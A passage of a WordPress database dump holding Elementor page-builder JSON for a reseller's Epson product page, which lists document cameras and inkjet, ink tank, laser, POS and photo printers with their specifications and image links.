usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"acb7593\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":144,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"f800ae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8124,3504,'_elementor_version','2.5.14'),(8648,3661,'_wp_page_template','template-fullwidth.php'),(8649,3661,'swift-performance','a:0:{}'),(8127,3505,'_wp_page_template','template-fullwidth.php'),(8128,3505,'_elementor_edit_mode','builder'),(8129,3505,'_elementor_template_type','post'),(8130,3505,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" 